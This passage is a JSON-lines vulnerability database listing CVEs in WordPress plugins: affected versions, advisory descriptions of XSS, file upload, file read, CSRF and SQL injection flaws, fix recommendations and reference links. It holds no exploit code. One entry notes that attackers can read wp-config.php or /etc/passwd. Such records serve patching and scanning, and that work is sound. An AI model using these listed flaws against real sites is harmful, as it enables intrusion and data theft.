version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0dd70b9-6f8a-41fc-ab4f-f6cdfee8dfb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0dd70b9-6f8a-41fc-ab4f-f6cdfee8dfb8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/1.9\\\/include\\\/view\\\/shortcode.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/1.9\\\/include\\\/view\\\/shortcode.php#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/2.0.1\\\/include\\\/view\\\/shortcode.php?rev=2981648#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/2.0.1\\\/include\\\/view\\\/shortcode.php?rev=2981648#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981654\\\/spice-post-slider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981654\\\/spice-post-slider\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-29384","slug":"jobwp","versionEndExcluding":"2.1","description":"Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin \u2013 JobWP. This issue affects WordPress Job Board and Recruitment Plugin \u2013 JobWP: from n\/a through 2.0.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-job-board-and-recruitment-plugin-jobwp-plugin-2-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-job-board-and-recruitment-plugin-jobwp-plugin-2-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7415","slug":"remember-me-controls","versionImpact":"2.0.1","versionEndExcluding":"2.1","description":"The Remember Me Controls plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0.1. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01707346-86c2-45c8-a2c9-81a147506fa4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01707346-86c2-45c8-a2c9-81a147506fa4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146603%40remember-me-controls&new=3146603%40remember-me-controls&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146603%40remember-me-controls&new=3146603%40remember-me-controls&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/remember-me-controls\\\/tags\\\/2.0.1\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/remember-me-controls\\\/tags\\\/2.0.1\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4194","slug":"album-and-image-gallery-plus-lightbox","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Album and Image Gallery plus Lightbox plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4822f1c7-3f83-416c-8957-17e4b53d7e69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4822f1c7-3f83-416c-8957-17e4b53d7e69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album-slider.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album-slider.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album.php#L185\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album.php#L185\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1730","slug":"simple-download-counter","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Simple Download Counter plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.0 via the 'simple_download_counter_download_handler'. This makes it possible for authenticated attackers, with Author-level access and above, to extract sensitive data including any local file on the server, such as wp-config.php or \/etc\/passwd.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L328\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L328\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L354\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L354\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247987\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247987\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0eafb20-4ef2-448b-9da7-ad8aa9e45215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0eafb20-4ef2-448b-9da7-ad8aa9e45215?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12403","slug":"awesome-responsive-photo-gallery","versionImpact":"1.0.5","versionEndExcluding":"2.1","description":"The Image Gallery \u2013 Responsive Photo Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'awsmgallery' parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-responsive-photo-gallery\\\/trunk\\\/inc\\\/arpg-process-options.php?rev=1877314\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-responsive-photo-gallery\\\/trunk\\\/inc\\\/arpg-process-options.php?rev=1877314\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221064%40awesome-responsive-photo-gallery&new=3221064%40awesome-responsive-photo-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221064%40awesome-responsive-photo-gallery&new=3221064%40awesome-responsive-photo-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca11e840-04bd-4731-bfa9-3bf8ed98e155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca11e840-04bd-4731-bfa9-3bf8ed98e155?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5091","slug":"skt-addons-for-elementor","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The SKT Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Age Gate and Creative Slider widgets in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8d63ee-4929-4940-bc6a-931524e20272?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8d63ee-4929-4940-bc6a-931524e20272?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098599\\\/skt-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098599\\\/skt-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7863","slug":"favicon-generator","versionImpact":"1.5","versionEndExcluding":"2.1","description":"The Favicon Generator (CLOSED) WordPress plugin before 2.1 does not validate files to be uploaded and does not have CSRF checks, which could allow attackers to make a logged in admin upload arbitrary files such as PHP on the server.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e814b02-3870-4742-905d-ec03b0d31add\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e814b02-3870-4742-905d-ec03b0d31add\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7568","slug":"favicon-generator","versionImpact":"1.5","versionEndExcluding":"2.1","description":"The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and closed the plugin; we recommend seeking an alternative to this plugin.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb3ad80-3510-4018-91af-b733ef62e28f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb3ad80-3510-4018-91af-b733ef62e28f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3139340%40favicon-generator&new=3139340%40favicon-generator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3139340%40favicon-generator&new=3139340%40favicon-generator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13583","slug":"simple-gallery-with-filter","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Simple Gallery with Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'c2tw_sgwf' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-gallery-with-filter\\\/trunk\\\/simple-gallery-with-filter.php#L377\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-gallery-with-filter\\\/trunk\\\/simple-gallery-with-filter.php#L377\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227234%40simple-gallery-with-filter&new=3227234%40simple-gallery-with-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227234%40simple-gallery-with-filter&new=3227234%40simple-gallery-with-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c088264-64a2-4a36-ae3b-fdf60f3837e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c088264-64a2-4a36-ae3b-fdf60f3837e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12407","slug":"push-notification-for-post-and-buddypress","versionImpact":"2.06","versionEndExcluding":"2.08","description":"The Push Notification for Post and BuddyPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'pushnotificationid' parameter in all versions up to, and including, 2.06 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.08, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/push-notification-for-post-and-buddypress\\\/trunk\\\/admin\\\/pnfpb_admin_ondemand_notification_settings.php#L711\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/push-notification-for-post-and-buddypress\\\/trunk\\\/admin\\\/pnfpb_admin_ondemand_notification_settings.php#L711\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7be653-4d5b-4cbe-ad9c-6c2748f533bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7be653-4d5b-4cbe-ad9c-6c2748f533bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2606","slug":"wpbrutalai","versionEndExcluding":"2.06","description":"The WP Brutal AI WordPress plugin before 2.06 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62deb3ed-a7e4-4cdc-a615-cad2ec2e1e8f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62deb3ed-a7e4-4cdc-a615-cad2ec2e1e8f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2017-20194","slug":"formidable","versionEndExcluding":"2.05.03","description":"The Formidable Form Builder plugin for WordPress is vulnerable to Sensitive Data Exposure in versions up to, and including, 2.05.03 via the frm_forms_preview AJAX action. This makes it possible for unauthenticated attackers to export all of the form entries for a given form.","recommendation":"Update to version 2.05.03, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7600fe1-94e4-4e3e-a9a6-ff3589813715?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7600fe1-94e4-4e3e-a9a6-ff3589813715?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/klikki.fi\\\/formidable-forms-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/klikki.fi\\\/formidable-forms-vulnerabilities\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2017-20192","slug":"formidable","versionEndExcluding":"2.05.03","description":"The Formidable Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters submitted during form entries like 'after_html' in versions before 2.05.03 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute in a victim's browser.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900fcaab-2424-4ae8-af18-95659db0dbe3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900fcaab-2424-4ae8-af18-95659db0dbe3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/formidable.html\",\"name\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/formidable.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formidable\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formidable\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10017","slug":"portfolio-by-lisa-westlund","versionImpact":"2.04","versionEndExcluding":"2.05","description":"A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.04 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.06 is able to address this issue. The patch is named 68af950330c3202a706f0ae9bbb52ceaa17dda9d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248955.","recommendation":"Update to version 2.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.248955\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.248955\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248955\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248955\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/portfolio\\\/commit\\\/68af950330c3202a706f0ae9bbb52ceaa17dda9d\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/portfolio\\\/commit\\\/68af950330c3202a706f0ae9bbb52ceaa17dda9d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4661","slug":"wp-reset","versionImpact":"2.01","versionEndExcluding":"2.03","description":"The WP Reset plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_ajax function in all versions up to, and including, 2.02. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the value of the 'License Key' field for the 'Activate Pro License' setting.","recommendation":"Update to version 2.03, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d2dc86e-f937-429f-9baa-0eb0a8715513?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d2dc86e-f937-429f-9baa-0eb0a8715513?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097597\\\/wp-reset\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097597\\\/wp-reset\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2303","slug":"easy-textillate","versionImpact":"2.01","versionEndExcluding":"2.02","description":"The Easy Textillate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'textillate' shortcode in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7165","slug":"backup","versionEndExcluding":"2.0.9.9","description":"The JetBackup WordPress plugin before 2.0.9.9 doesn't use index files to prevent public directory listing of sensitive directories in certain configurations, which allows malicious actors to leak backup files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8874","slug":"master-addons","versionImpact":"2.0.9.0","versionEndExcluding":"2.0.9.1","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 2.0.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/vendor\\\/fancybox\\\/jquery.fancybox.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/vendor\\\/fancybox\\\/jquery.fancybox.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338452%40master-addons&new=3338452%40master-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338452%40master-addons&new=3338452%40master-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340128%40master-addons&new=3340128%40master-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340128%40master-addons&new=3340128%40master-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/master-addons\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/master-addons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4fb1b-eed4-4ef9-9856-7c5095117aa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4fb1b-eed4-4ef9-9856-7c5095117aa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5799","slug":"wp-hotel-booking","versionImpact":"2.0.8","versionEndExcluding":"2.0.9","description":"The WP Hotel Booking WordPress plugin before 2.0.8 does not have proper authorisation when deleting a package, allowing Contributor and above roles to delete posts that do not belong to them","recommendation":"Update to version 2.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3061f85e-a70e-49e5-bccf-ae9240f51178\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3061f85e-a70e-49e5-bccf-ae9240f51178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2732","slug":"themify-shortcodes","versionImpact":"2.0.8","versionEndExcluding":"2.0.9","description":"The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themify_post_slider' shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056453\\\/themify-shortcodes\\\/trunk\\\/includes\\\/themify-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056453\\\/themify-shortcodes\\\/trunk\\\/includes\\\/themify-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0487","slug":"mystickyelements","versionEndExcluding":"2.0.9","description":"The My Sticky Elements WordPress plugin before 2.0.9 does not properly sanitise and escape a parameter before using it in a SQL statement when deleting messages, leading to a SQL injection exploitable by high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e874a1d-c866-45fa-b456-c8012dca32af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e874a1d-c866-45fa-b456-c8012dca32af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1624","slug":"insert-headers-and-footers","versionEndExcluding":"2.0.9","description":"The WPCode WordPress plugin before 2.0.9 has a flawed CSRF when deleting log, and does not ensure that the file to be deleted is inside the expected folder. This could allow attackers to make users with the wpcode_activate_snippets capability delete arbitrary log files on the server, including outside of the blog folders","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b70e5-4368-43b4-81f6-2d01bc09dc8f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b70e5-4368-43b4-81f6-2d01bc09dc8f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5284","slug":"master-addons","versionImpact":"2.0.8.2","versionEndExcluding":"2.0.8.3","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom JS extension in all versions up to, and including, 2.0.8.2 due to insufficient capability restriction, and insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/inc\\\/modules\\\/custom-js\\\/custom-js.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/inc\\\/modules\\\/custom-js\\\/custom-js.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325322\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325322\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1982bd-3ea8-48cd-8b89-39910567525c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1982bd-3ea8-48cd-8b89-39910567525c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
